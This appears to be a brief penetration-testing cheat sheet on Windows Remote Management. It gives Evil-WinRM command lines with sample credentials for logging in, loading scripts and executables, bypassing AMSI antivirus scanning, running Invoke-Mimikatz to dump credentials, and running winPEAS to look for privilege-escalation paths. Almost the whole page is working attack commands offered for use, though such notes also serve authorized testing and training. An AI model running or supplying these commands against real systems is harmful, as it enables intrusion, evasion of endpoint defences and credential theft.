WinRM
ABOUT
Evil-WinRM
evil-winrm -i 13.13.13.13 -u venator17 -p password123Load Scripts
evil-winrm -i 13.13.13.13 -u venator17 -p password123 -s /opt/scripts/powershell # -s is location of scripts
Bypass-4MSI # Bypassing AMSI
Invoke-Mimikatz.ps1 # Loading it into memoryu
Invoke-Mimikatz # ExecutingLoading Executables
evil-winrm -i 13.13.13.13 -u venator17 -p password123 -e /opt/executables # -e is location of executables
Invoke-Binary /opt/executables/winPEAS.exeLoading Files
Nmap WinRM
CrackMapExec
PowerShell
RESOURCES
Last updated
